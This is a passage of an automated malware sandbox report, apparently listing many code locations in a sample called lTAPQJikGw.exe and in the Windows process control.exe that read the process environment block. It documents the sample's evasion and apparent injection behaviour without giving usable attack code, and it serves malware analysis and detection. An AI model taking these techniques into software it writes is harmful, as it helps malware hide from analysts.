          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556C0A mov eax, dword ptr fs:[00000030h]2_2_01556C0A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556C0A mov eax, dword ptr fs:[00000030h]2_2_01556C0A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556C0A mov eax, dword ptr fs:[00000030h]2_2_01556C0A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556C0A mov eax, dword ptr fs:[00000030h]2_2_01556C0A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150BC2C mov eax, dword ptr fs:[00000030h]2_2_0150BC2C
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A8CD6 mov eax, dword ptr fs:[00000030h]2_2_015A8CD6
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015914FB mov eax, dword ptr fs:[00000030h]2_2_015914FB
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556CF0 mov eax, dword ptr fs:[00000030h]2_2_01556CF0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556CF0 mov eax, dword ptr fs:[00000030h]2_2_01556CF0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556CF0 mov eax, dword ptr fs:[00000030h]2_2_01556CF0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E849B mov eax, dword ptr fs:[00000030h]2_2_014E849B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EEF40 mov eax, dword ptr fs:[00000030h]2_2_014EEF40
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EFF60 mov eax, dword ptr fs:[00000030h]2_2_014EFF60
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A8F6A mov eax, dword ptr fs:[00000030h]2_2_015A8F6A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156FF10 mov eax, dword ptr fs:[00000030h]2_2_0156FF10
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156FF10 mov eax, dword ptr fs:[00000030h]2_2_0156FF10
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A070D mov eax, dword ptr fs:[00000030h]2_2_015A070D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A070D mov eax, dword ptr fs:[00000030h]2_2_015A070D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FF716 mov eax, dword ptr fs:[00000030h]2_2_014FF716
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150A70E mov eax, dword ptr fs:[00000030h]2_2_0150A70E
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150A70E mov eax, dword ptr fs:[00000030h]2_2_0150A70E
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150E730 mov eax, dword ptr fs:[00000030h]2_2_0150E730
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D4F2E mov eax, dword ptr fs:[00000030h]2_2_014D4F2E
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D4F2E mov eax, dword ptr fs:[00000030h]2_2_014D4F2E
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015137F5 mov eax, dword ptr fs:[00000030h]2_2_015137F5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01557794 mov eax, dword ptr fs:[00000030h]2_2_01557794
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01557794 mov eax, dword ptr fs:[00000030h]2_2_01557794
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01557794 mov eax, dword ptr fs:[00000030h]2_2_01557794
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E8794 mov eax, dword ptr fs:[00000030h]2_2_014E8794
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E7E41 mov eax, dword ptr fs:[00000030h]2_2_014E7E41
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E7E41 mov eax, dword ptr fs:[00000030h]2_2_014E7E41
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E7E41 mov eax, dword ptr fs:[00000030h]2_2_014E7E41
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E7E41 mov eax, dword ptr fs:[00000030h]2_2_014E7E41
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E7E41 mov eax, dword ptr fs:[00000030h]2_2_014E7E41
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E7E41 mov eax, dword ptr fs:[00000030h]2_2_014E7E41
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159AE44 mov eax, dword ptr fs:[00000030h]2_2_0159AE44
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159AE44 mov eax, dword ptr fs:[00000030h]2_2_0159AE44
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E766D mov eax, dword ptr fs:[00000030h]2_2_014E766D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FAE73 mov eax, dword ptr fs:[00000030h]2_2_014FAE73
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FAE73 mov eax, dword ptr fs:[00000030h]2_2_014FAE73
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FAE73 mov eax, dword ptr fs:[00000030h]2_2_014FAE73
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FAE73 mov eax, dword ptr fs:[00000030h]2_2_014FAE73
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FAE73 mov eax, dword ptr fs:[00000030h]2_2_014FAE73
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150A61C mov eax, dword ptr fs:[00000030h]2_2_0150A61C
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150A61C mov eax, dword ptr fs:[00000030h]2_2_0150A61C
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DC600 mov eax, dword ptr fs:[00000030h]2_2_014DC600
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DC600 mov eax, dword ptr fs:[00000030h]2_2_014DC600
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DC600 mov eax, dword ptr fs:[00000030h]2_2_014DC600
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01508E00 mov eax, dword ptr fs:[00000030h]2_2_01508E00
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591608 mov eax, dword ptr fs:[00000030h]2_2_01591608
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0158FE3F mov eax, dword ptr fs:[00000030h]2_2_0158FE3F
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DE620 mov eax, dword ptr fs:[00000030h]2_2_014DE620
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A8ED6 mov eax, dword ptr fs:[00000030h]2_2_015A8ED6
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01518EC7 mov eax, dword ptr fs:[00000030h]2_2_01518EC7
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0158FEC0 mov eax, dword ptr fs:[00000030h]2_2_0158FEC0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015036CC mov eax, dword ptr fs:[00000030h]2_2_015036CC
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E76E2 mov eax, dword ptr fs:[00000030h]2_2_014E76E2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015016E0 mov ecx, dword ptr fs:[00000030h]2_2_015016E0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156FE87 mov eax, dword ptr fs:[00000030h]2_2_0156FE87
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015546A7 mov eax, dword ptr fs:[00000030h]2_2_015546A7
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A0EA5 mov eax, dword ptr fs:[00000030h]2_2_015A0EA5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A0EA5 mov eax, dword ptr fs:[00000030h]2_2_015A0EA5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A0EA5 mov eax, dword ptr fs:[00000030h]2_2_015A0EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBF0BF mov ecx, dword ptr fs:[00000030h]7_2_04BBF0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBF0BF mov eax, dword ptr fs:[00000030h]7_2_04BBF0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBF0BF mov eax, dword ptr fs:[00000030h]7_2_04BBF0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1B8D0 mov eax, dword ptr fs:[00000030h]7_2_04C1B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1B8D0 mov ecx, dword ptr fs:[00000030h]7_2_04C1B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1B8D0 mov eax, dword ptr fs:[00000030h]7_2_04C1B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1B8D0 mov eax, dword ptr fs:[00000030h]7_2_04C1B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1B8D0 mov eax, dword ptr fs:[00000030h]7_2_04C1B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1B8D0 mov eax, dword ptr fs:[00000030h]7_2_04C1B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C58CD6 mov eax, dword ptr fs:[00000030h]7_2_04C58CD6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC90AF mov eax, dword ptr fs:[00000030h]7_2_04BC90AF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB20A0 mov eax, dword ptr fs:[00000030h]7_2_04BB20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB20A0 mov eax, dword ptr fs:[00000030h]7_2_04BB20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB20A0 mov eax, dword ptr fs:[00000030h]7_2_04BB20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB20A0 mov eax, dword ptr fs:[00000030h]7_2_04BB20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB20A0 mov eax, dword ptr fs:[00000030h]7_2_04BB20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB20A0 mov eax, dword ptr fs:[00000030h]7_2_04BB20A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9849B mov eax, dword ptr fs:[00000030h]7_2_04B9849B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06CF0 mov eax, dword ptr fs:[00000030h]7_2_04C06CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06CF0 mov eax, dword ptr fs:[00000030h]7_2_04C06CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06CF0 mov eax, dword ptr fs:[00000030h]7_2_04C06CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B89080 mov eax, dword ptr fs:[00000030h]7_2_04B89080
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C414FB mov eax, dword ptr fs:[00000030h]7_2_04C414FB
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C03884 mov eax, dword ptr fs:[00000030h]7_2_04C03884
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C03884 mov eax, dword ptr fs:[00000030h]7_2_04C03884
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B858EC mov eax, dword ptr fs:[00000030h]7_2_04B858EC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1C450 mov eax, dword ptr fs:[00000030h]7_2_04C1C450
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C1C450 mov eax, dword ptr fs:[00000030h]7_2_04C1C450
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9B02A mov eax, dword ptr fs:[00000030h]7_2_04B9B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9B02A mov eax, dword ptr fs:[00000030h]7_2_04B9B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9B02A mov eax, dword ptr fs:[00000030h]7_2_04B9B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9B02A mov eax, dword ptr fs:[00000030h]7_2_04B9B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB002D mov eax, dword ptr fs:[00000030h]7_2_04BB002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB002D mov eax, dword ptr fs:[00000030h]7_2_04BB002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB002D mov eax, dword ptr fs:[00000030h]7_2_04BB002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB002D mov eax, dword ptr fs:[00000030h]7_2_04BB002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB002D mov eax, dword ptr fs:[00000030h]7_2_04BB002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBBC2C mov eax, dword ptr fs:[00000030h]7_2_04BBBC2C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C51074 mov eax, dword ptr fs:[00000030h]7_2_04C51074
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C42073 mov eax, dword ptr fs:[00000030h]7_2_04C42073
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]7_2_04C41C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]7_2_04C41C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]7_2_04C41C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]7_2_04C41C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]7_2_04C41C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]7_2_04C41C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]7_2_04C41C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]7_2_04C41C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]7_2_04C41C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]7_2_04C41C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]7_2_04C41C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]7_2_04C41C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]7_2_04C41C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C41C06 mov eax, dword ptr fs:[00000030h]7_2_04C41C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C5740D mov eax, dword ptr fs:[00000030h]7_2_04C5740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C5740D mov eax, dword ptr fs:[00000030h]7_2_04C5740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C5740D mov eax, dword ptr fs:[00000030h]7_2_04C5740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06C0A mov eax, dword ptr fs:[00000030h]7_2_04C06C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06C0A mov eax, dword ptr fs:[00000030h]7_2_04C06C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06C0A mov eax, dword ptr fs:[00000030h]7_2_04C06C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06C0A mov eax, dword ptr fs:[00000030h]7_2_04C06C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C54015 mov eax, dword ptr fs:[00000030h]7_2_04C54015
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C54015 mov eax, dword ptr fs:[00000030h]7_2_04C54015
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C07016 mov eax, dword ptr fs:[00000030h]7_2_04C07016
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C07016 mov eax, dword ptr fs:[00000030h]7_2_04C07016
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C07016 mov eax, dword ptr fs:[00000030h]7_2_04C07016
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA746D mov eax, dword ptr fs:[00000030h]7_2_04BA746D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA0050 mov eax, dword ptr fs:[00000030h]7_2_04BA0050
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA0050 mov eax, dword ptr fs:[00000030h]7_2_04BA0050
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBA44B mov eax, dword ptr fs:[00000030h]7_2_04BBA44B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06DC9 mov eax, dword ptr fs:[00000030h]7_2_04C06DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06DC9 mov eax, dword ptr fs:[00000030h]7_2_04C06DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06DC9 mov eax, dword ptr fs:[00000030h]7_2_04C06DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06DC9 mov ecx, dword ptr fs:[00000030h]7_2_04C06DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06DC9 mov eax, dword ptr fs:[00000030h]7_2_04C06DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C06DC9 mov eax, dword ptr fs:[00000030h]7_2_04C06DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB1DB5 mov eax, dword ptr fs:[00000030h]7_2_04BB1DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB1DB5 mov eax, dword ptr fs:[00000030h]7_2_04BB1DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB1DB5 mov eax, dword ptr fs:[00000030h]7_2_04BB1DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB35A1 mov eax, dword ptr fs:[00000030h]7_2_04BB35A1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB61A0 mov eax, dword ptr fs:[00000030h]7_2_04BB61A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB61A0 mov eax, dword ptr fs:[00000030h]7_2_04BB61A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBFD9B mov eax, dword ptr fs:[00000030h]7_2_04BBFD9B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBFD9B mov eax, dword ptr fs:[00000030h]7_2_04BBFD9B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C141E8 mov eax, dword ptr fs:[00000030h]7_2_04C141E8
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB2990 mov eax, dword ptr fs:[00000030h]7_2_04BB2990
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C38DF1 mov eax, dword ptr fs:[00000030h]7_2_04C38DF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B82D8A mov eax, dword ptr fs:[00000030h]7_2_04B82D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B82D8A mov eax, dword ptr fs:[00000030h]7_2_04B82D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B82D8A mov eax, dword ptr fs:[00000030h]7_2_04B82D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B82D8A mov eax, dword ptr fs:[00000030h]7_2_04B82D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B82D8A mov eax, dword ptr fs:[00000030h]7_2_04B82D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BAC182 mov eax, dword ptr fs:[00000030h]7_2_04BAC182
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB2581 mov eax, dword ptr fs:[00000030h]7_2_04BB2581
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB2581 mov eax, dword ptr fs:[00000030h]7_2_04BB2581
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB2581 mov eax, dword ptr fs:[00000030h]7_2_04BB2581
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB2581 mov eax, dword ptr fs:[00000030h]7_2_04BB2581
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBA185 mov eax, dword ptr fs:[00000030h]7_2_04BBA185
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8B1E1 mov eax, dword ptr fs:[00000030h]7_2_04B8B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8B1E1 mov eax, dword ptr fs:[00000030h]7_2_04B8B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8B1E1 mov eax, dword ptr fs:[00000030h]7_2_04B8B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9D5E0 mov eax, dword ptr fs:[00000030h]7_2_04B9D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9D5E0 mov eax, dword ptr fs:[00000030h]7_2_04B9D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C069A6 mov eax, dword ptr fs:[00000030h]7_2_04C069A6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C505AC mov eax, dword ptr fs:[00000030h]7_2_04C505AC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C505AC mov eax, dword ptr fs:[00000030h]7_2_04C505AC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C051BE mov eax, dword ptr fs:[00000030h]7_2_04C051BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C051BE mov eax, dword ptr fs:[00000030h]7_2_04C051BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C051BE mov eax, dword ptr fs:[00000030h]7_2_04C051BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C051BE mov eax, dword ptr fs:[00000030h]7_2_04C051BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB4D3B mov eax, dword ptr fs:[00000030h]7_2_04BB4D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB4D3B mov eax, dword ptr fs:[00000030h]7_2_04BB4D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB4D3B mov eax, dword ptr fs:[00000030h]7_2_04BB4D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C03540 mov eax, dword ptr fs:[00000030h]7_2_04C03540
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB513A mov eax, dword ptr fs:[00000030h]7_2_04BB513A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BB513A mov eax, dword ptr fs:[00000030h]7_2_04BB513A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8AD30 mov eax, dword ptr fs:[00000030h]7_2_04B8AD30
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]7_2_04B93D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]7_2_04B93D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]7_2_04B93D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]7_2_04B93D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]7_2_04B93D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]7_2_04B93D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]7_2_04B93D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]7_2_04B93D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]7_2_04B93D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]7_2_04B93D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]7_2_04B93D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]7_2_04B93D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B93D34 mov eax, dword ptr fs:[00000030h]7_2_04B93D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA4120 mov eax, dword ptr fs:[00000030h]7_2_04BA4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA4120 mov eax, dword ptr fs:[00000030h]7_2_04BA4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA4120 mov eax, dword ptr fs:[00000030h]7_2_04BA4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA4120 mov eax, dword ptr fs:[00000030h]7_2_04BA4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA4120 mov ecx, dword ptr fs:[00000030h]7_2_04BA4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B89100 mov eax, dword ptr fs:[00000030h]7_2_04B89100
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B89100 mov eax, dword ptr fs:[00000030h]7_2_04B89100
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B89100 mov eax, dword ptr fs:[00000030h]7_2_04B89100
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8B171 mov eax, dword ptr fs:[00000030h]7_2_04B8B171
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8B171 mov eax, dword ptr fs:[00000030h]7_2_04B8B171
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BAC577 mov eax, dword ptr fs:[00000030h]7_2_04BAC577
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BAC577 mov eax, dword ptr fs:[00000030h]7_2_04BAC577
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B8C962 mov eax, dword ptr fs:[00000030h]7_2_04B8C962
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BA7D50 mov eax, dword ptr fs:[00000030h]7_2_04BA7D50
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C58D34 mov eax, dword ptr fs:[00000030h]7_2_04C58D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C0A537 mov eax, dword ptr fs:[00000030h]7_2_04C0A537
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BAB944 mov eax, dword ptr fs:[00000030h]7_2_04BAB944
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BAB944 mov eax, dword ptr fs:[00000030h]7_2_04BAB944
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BC3D43 mov eax, dword ptr fs:[00000030h]7_2_04BC3D43
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04C3FEC0 mov eax, dword ptr fs:[00000030h]7_2_04C3FEC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9AAB0 mov eax, dword ptr fs:[00000030h]7_2_04B9AAB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B9AAB0 mov eax, dword ptr fs:[00000030h]7_2_04B9AAB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BBFAB0 mov eax, dword ptr fs:[00000030h]7_2_04BBFAB0
